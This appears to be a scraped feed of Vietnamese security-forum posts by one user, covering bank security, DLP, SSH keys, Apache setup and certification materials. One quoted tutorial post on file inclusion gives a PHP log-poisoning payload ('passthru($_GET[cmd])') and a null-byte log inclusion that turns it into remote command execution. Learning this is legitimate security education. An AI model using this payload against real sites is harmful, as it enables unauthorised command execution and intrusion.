<![CDATA[Messages posted by "antiadmin"]]> /hvaonline/posts/listByUser/180537.html JForum - http://www.jforum.net Ngân hàng bảo mật như thế nào?

angel_of_devil wrote:
Hình như bên MB là token bấm sinh mã :D Trong các core banking hiện tại, core của Techcombank lởm nhất, chậm tệ hại, lại chỉ xài đc với IE 
Mình không biết Core banking làm những nhiệm vụ gì? Có những loại core banking nào? Bạn mở tài khoản của ngân hàng nào rồi? Mình cũng đang muốn mở tài khoản mà không biết chọn ngân hàng nào, chỉ tìm hiểu có những dịch vụ nào thôi mà ko để ý đến hệ thống. Mình thấy Techcombank cũng có nhiều người dùng mà.]]>
/hvaonline/posts/preList/39337/244987.html#244987 /hvaonline/posts/preList/39337/244987.html#244987 GMT
Hỏi về điểm ưu khuyết của OSSEC vs SNORT vs AIDE ( IDS ) ? /hvaonline/posts/preList/39758/244901.html#244901 /hvaonline/posts/preList/39758/244901.html#244901 GMT Khong cho user copy file về máy client

zalman wrote:
Hiện tại mình đang có nhiệm vụ là bảo vệ tài liệu cho cty, nv đặt ra là cho user đọc nhưng ko copy về máy client được,mình nghiên cứu NTFS permison thì ko thể nào làm dc , đã cho read thì copy được. và ko copy dc thì cũng ko read được nốt. :-S Sử dụng RMS server thì chỉ có thể phân quyền trên từng file ko cho copy được nội dung, nhưng cái này thí botay với thư mục. :| Vậy cho mình hỏi có giải pháp nào cho vấn đề này ko, chỉ đọc ko cho copy.hay là cái này ko thề thực hiện dc. Cám ơn mọi người. :x 
Bạn thử dùng DLP chưa? Có đầy đủ các tính năng như bạn muốn, read được nhưng ko copy được, có thể cấm cả chụp màn hình. Còn dùng máy ảnh chụp hoặc đọc rồi viết ra giấy thì đành chịu thôi :D]]>
/hvaonline/posts/preList/37728/232205.html#232205 /hvaonline/posts/preList/37728/232205.html#232205 GMT
Security Information and Event Management (SIEM) Implementation
http://www.mediafire.com/?2odzzbm4dqy Bạn nào đã đánh giá, triển khai mấy solution này rồi chia sẻ kinh nghiệm cho mọi người tham khảo với.]]>
/hvaonline/posts/preList/37274/229366.html#229366 /hvaonline/posts/preList/37274/229366.html#229366 GMT
Chống vào bằng link trực tiếp trên ASP.NET /hvaonline/posts/preList/37028/227621.html#227621 /hvaonline/posts/preList/37028/227621.html#227621 GMT Giới thiệu tấn công Remote/Local File Inclusion

gamma95 wrote:
lolz, tui đâu thấy bồ antiadmin bổ sung gì đâu ?? Seamoun để phpinfo() chỉ là PoC mà :D 
:D tùy bro nghĩ. Với tui nó khác, vì mở ra thêm 1 hướng mới. Tôi nghĩ các bạn mới tìm hiểu cũng thấy vậy. Nếu gamma95 có ý kiến gì hay thì cứ chia sẻ mọi người học hỏi lolz :D ]]>
/hvaonline/posts/preList/36793/226552.html#226552 /hvaonline/posts/preList/36793/226552.html#226552 GMT
Giới thiệu tấn công Remote/Local File Inclusion

seamoun wrote:
d. Khai thác sử dụng Log Files Chuyện gì sẽ xảy ra nếu chúng ta đệ trình với URL như sau Code:
http://www.example1.com/index.php?page=<? echo phpinfo(); ?>
 
Thay vì sử dụng hàm phpinfo(), có thể sử dụng Code:
<? passthru($_GET[cmd]) ?>
Khi đó file log sẽ có dạng
192.168.1.14 - - [15/Jul/2009:17:54:01 +0700] "GET /demo/index.php?page=<? passthru($_GET[cmd]) ?> HTTP/1.1" 200 492 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1) Gecko/20090624 Firefox/3.5"  
Truy vấn đến log file theo URL: Code:
http://example.com/demo/index.php?page=<đường dẫn đến file log>
Sẽ có thông báo lỗi: Code:
Warning: passthru() [function.passthru]: Cannot execute a blank command in 
	/path/to/logfile.log  on line xxx
Bây giờ có thể chạy lệnh như sau: Code:
http://example.com/demo/index.php?page=.../path/to/logfile.log%00&cmd=ls -la
Như vậy đã chuyển sang RCE @ tanviet12

tanviet12 wrote:
Mình mới tìm được cái video về RFI (Remove file include), bạn nào chưa hiểu lắm về RFI thì có thể xem 
RFI là Remote File Inclusion ]]>
/hvaonline/posts/preList/36793/226525.html#226525 /hvaonline/posts/preList/36793/226525.html#226525 GMT
1 tuần nghiên cứu một dịch vụ trên Linux ! /hvaonline/posts/preList/36747/226453.html#226453 /hvaonline/posts/preList/36747/226453.html#226453 GMT 1 tuần nghiên cứu một dịch vụ trên Linux ! /hvaonline/posts/preList/36747/226056.html#226056 /hvaonline/posts/preList/36747/226056.html#226056 GMT 1 tuần nghiên cứu một dịch vụ trên Linux ! Kiểm soát bằng việc trust hoặc không trust key được tạo ra. Vấn đề em gặp phải ở đây là bất kỳ Client nào tạo request kết nối đến SSH server đều được Server đẩy cho public key của mình. Như vậy Client nào cũng có thể kết nối được đến Server miễn là chỉ cần user/password. Vậy làm cách nào để Server kiểm tra Client đó có "trust" thật ko?. Để có user/pass cũng không kết nối được. Theo em nghĩ phải có thêm bước ngược lại ở trên: Client tự tạo public và private key của mình, sau đó copy, add bằng tay lên server. Mỗi khi khởi tạo kết nối, client sẽ trình public key của mình ra cho server thấy nếu đúng thì mới tiếp tục các bước tiếp theo. Có đúng vậy không anh? @ xnohat: thank bài viết của bạn. Mình muốn biết khi bật tính năng đăng nhập ( xác thực ) bằng Public/Private Key cụ thể nó hay như thế nào? ]]> /hvaonline/posts/preList/36747/225809.html#225809 /hvaonline/posts/preList/36747/225809.html#225809 GMT 1 tuần nghiên cứu một dịch vụ trên Linux ! /hvaonline/posts/preList/36747/225784.html#225784 /hvaonline/posts/preList/36747/225784.html#225784 GMT Xin giúp đỡ về việc cài đặt Apache + PHP + MySQL

ngoungnguyen wrote:
Sau khi install Apache và PHP và MySQL xong (để cùng 1 thư mục trên ổ C là mysever , PHP được cài đặt như 1 module của apache ) em vào phần hệ thống của Apache mở file conf/httpd thì thấy PHP đã tự động được gọi vào apache  

ngoungnguyen wrote:
1 PHPIniDir "C:/myserver/apache2.2/PHP/" 2 LoadModule php5_module "C:/myserver/apache2.2/PHP/php5apache2_2.dll"  

ngoungnguyen wrote:
LoadModule php5_module "C:/myserver/php/php5apache2_2.dll" AddType application/x-httpd-php .php  
Bạn xem có phải sai đường dẫn đến file php5apache2_2.dll ]]>
/hvaonline/posts/preList/36713/225530.html#225530 /hvaonline/posts/preList/36713/225530.html#225530 GMT
tìm nhà cung cấp chứng chỉ SSL verisign ở vietnam /hvaonline/posts/preList/35871/220617.html#220617 /hvaonline/posts/preList/35871/220617.html#220617 GMT giúp crack wifi với bt4. /hvaonline/posts/preList/33806/208255.html#208255 /hvaonline/posts/preList/33806/208255.html#208255 GMT Cần tài liệu ECSA/LPT /hvaonline/posts/preList/33851/208253.html#208253 /hvaonline/posts/preList/33851/208253.html#208253 GMT Cần tài liệu ECSA/LPT /hvaonline/posts/preList/33851/208128.html#208128 /hvaonline/posts/preList/33851/208128.html#208128 GMT Tài liệu EC-Council Certified Security Analyst (ECSA) /hvaonline/posts/preList/28901/208126.html#208126 /hvaonline/posts/preList/28901/208126.html#208126 GMT